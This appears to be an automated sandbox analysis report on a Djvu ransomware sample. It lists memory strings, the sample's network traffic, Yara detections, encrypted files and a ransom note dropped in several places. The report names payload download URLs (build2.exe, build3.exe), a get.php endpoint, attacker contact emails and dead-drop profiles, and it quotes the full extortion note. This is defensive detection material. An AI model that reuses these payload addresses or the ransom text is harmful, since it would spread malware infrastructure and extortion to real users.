            Source: qJKiVKZdFk.exe, 00000006.00000003.1928900670.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/files/1/build3.exe$runo
            Source: qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/files/1/build3.exerun
            Source: qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.php
            Source: qJKiVKZdFk.exe, 00000006.00000003.1928900670.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.phpDh
            Source: qJKiVKZdFk.exe, 00000006.00000003.1339999896.00000000097E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
            Source: qJKiVKZdFk.exe, 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
            Source: qJKiVKZdFk.exe, 00000006.00000003.1928900670.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sdfjhuz.com/dl/build2.exe
            Source: qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sdfjhuz.com/dl/build2.exe$run
            Source: qJKiVKZdFk.exe, 00000006.00000003.1928900670.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sdfjhuz.com/dl/build2.exeKf
            Source: qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sdfjhuz.com/dl/build2.exerun421f
            Source: qJKiVKZdFk.exe, 00000006.00000003.1331279869.00000000097E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
            Source: qJKiVKZdFk.exe, 00000006.00000003.1331584052.00000000097E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
            Source: qJKiVKZdFk.exeString found in binary or memory: http://www.openssl.org/support/faq.html
            Source: qJKiVKZdFk.exe, 00000006.00000003.1331753147.00000000097E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
            Source: qJKiVKZdFk.exe, 00000006.00000003.1331822942.00000000097E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
            Source: qJKiVKZdFk.exe, 00000006.00000003.1331883438.00000000097E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
            Source: qJKiVKZdFk.exe, 00000006.00000003.1334941616.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1389742284.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
            Source: qJKiVKZdFk.exe, 00000006.00000003.1928900670.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1257098111.00000000008B6000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
            Source: qJKiVKZdFk.exe, 00000002.00000002.1241276068.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/:b
            Source: qJKiVKZdFk.exe, 00000002.00000002.1241276068.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/Hb
            Source: qJKiVKZdFk.exeString found in binary or memory: https://api.2ip.ua/geo.json
            Source: qJKiVKZdFk.exe, 00000002.00000002.1241276068.00000000006B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonL
            Source: qJKiVKZdFk.exe, 00000006.00000003.1257098111.00000000008B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonfq
            Source: qJKiVKZdFk.exe, 00000006.00000003.1344123996.00000000097E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/privacy-sdx.win32.bundle.js.map/e3b0c4429
            Source: qJKiVKZdFk.exe, 00000006.00000003.1334941616.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1389742284.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
            Source: qJKiVKZdFk.exe, 00000006.00000003.1334941616.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1389742284.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
            Source: qJKiVKZdFk.exe, 00000006.00000003.1334941616.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1389742284.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
            Source: qJKiVKZdFk.exe, 00000006.00000003.1345260056.00000000097E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/generate_204
            Source: qJKiVKZdFk.exe, 00000006.00000003.1345260056.00000000097E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/react-native-community/react-native-netinfo
            Source: qJKiVKZdFk.exe, 00000006.00000003.1339999896.00000000097E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api
            Source: build2.exe, 00000012.00000002.1332847113.0000000003540000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888
            Source: build2.exe, 00000012.00000002.1332847113.0000000003540000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0
            Source: build2.exe, 00000012.00000002.1332847113.0000000003540000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/irfail
            Source: build2.exe, 00000012.00000002.1332847113.0000000003540000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/irfailAt
            Source: qJKiVKZdFk.exe, 00000006.00000003.1928900670.0000000000902000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.000000000091A000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.0000000000902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.7:49699 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.7:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.7:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.65.44.84:443 -> 192.168.2.7:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.7:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.7:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.7:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.7:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.7:49727 version: TLS 1.2
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,2_2_004822E0

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Found ransom note / readme
            Source: C:\_README.txtDropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0863PsawqStp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyTJump to dropped file
            Yara detected Djvu Ransomware
            Source: Yara matchFile source: 26.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.qJKiVKZdFk.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.qJKiVKZdFk.exe.5e015a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 31.2.qJKiVKZdFk.exe.5e715a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 39.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 39.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.qJKiVKZdFk.exe.5dc15a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.qJKiVKZdFk.exe.5de15a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.qJKiVKZdFk.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.qJKiVKZdFk.exe.5e615a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.qJKiVKZdFk.exe.5e615a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 32.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.qJKiVKZdFk.exe.5e815a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.qJKiVKZdFk.exe.5e015a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.qJKiVKZdFk.exe.5e815a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.qJKiVKZdFk.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 31.2.qJKiVKZdFk.exe.5e715a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 32.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.qJKiVKZdFk.exe.5dc15a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000019.00000002.1459503770.0000000005E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.1939278808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.1390298736.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.1464580349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3676316923.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1385315034.0000000005E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3681953148.0000000000656000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.1505470760.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.1490507183.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.1930318065.0000000005E60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: qJKiVKZdFk.exe PID: 3076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: qJKiVKZdFk.exe PID: 6692, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: qJKiVKZdFk.exe PID: 4216, type: MEMORYSTR
            Modifies existing user documents (likely ransomware behavior)
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeFile moved: C:\Users\user\Desktop\GLTYDMDUST.pdf
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeFile deleted: C:\Users\user\Desktop\GLTYDMDUST.pdf
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeFile moved: C:\Users\user\Desktop\GLTYDMDUST.mp3
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeFile deleted: C:\Users\user\Desktop\GLTYDMDUST.mp3
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeFile moved: C:\Users\user\Desktop\NYMMPCEIMA\NWCXBPIUYI.xlsx
            Writes a notice file (html or txt) to demand a ransom
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile dropped: C:\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile dropped: C:\$WinREAgent\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile dropped: C:\$WinREAgent\Scratch\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile dropped: C:\Users\jones\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeFile dropped: C:\Users\user\AppData\Local\VirtualStore\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeFile dropped: C:\Users\user\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
            Writes many files with high entropy
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\UTD5SFEV\th[1].svg entropy: 7.994248524Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\UTD5SFEV\th[2].png entropy: 7.99217410728Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\XP05FTX1\4tiHI4cTzqiixje34Lb3KTOm39Q[1].js entropy: 7.99678439882Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\XP05FTX1\th[1].png entropy: 7.99044337408Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9a386491-5394-47a0-a408-e4e3a9d60139}\0.0.filtertrie.intermediate.txt entropy: 7.99577343767Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9a386491-5394-47a0-a408-e4e3a9d60139}\Apps.ft entropy: 7.99712927676Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg entropy: 7.99741287379Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{05ea5f90-4347-4a95-a7e3-40799835a752}\0.0.filtertrie.intermediate.txt entropy: 7.99608371401Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{05ea5f90-4347-4a95-a7e3-40799835a752}\Apps.ft entropy: 7.99688981452Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3bc3f5b6-b1ab-46e4-a933-7d8002b0a491}\0.0.filtertrie.intermediate.txt entropy: 7.99430851773Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3bc3f5b6-b1ab-46e4-a933-7d8002b0a491}\Apps.ft entropy: 7.99688194581Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite entropy: 7.99790722198Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm entropy: 7.99319202922Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extensions.json entropy: 7.99484173037Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm entropy: 7.99393127075Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite entropy: 7.99793531246Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite entropy: 7.99699134848Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm entropy: 7.99450513598Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shm entropy: 7.99428742481Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite entropy: 7.9980535378Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico entropy: 7.99882037126Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db entropy: 7.99598250789Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico entropy: 7.99765334019Jump to dropped file
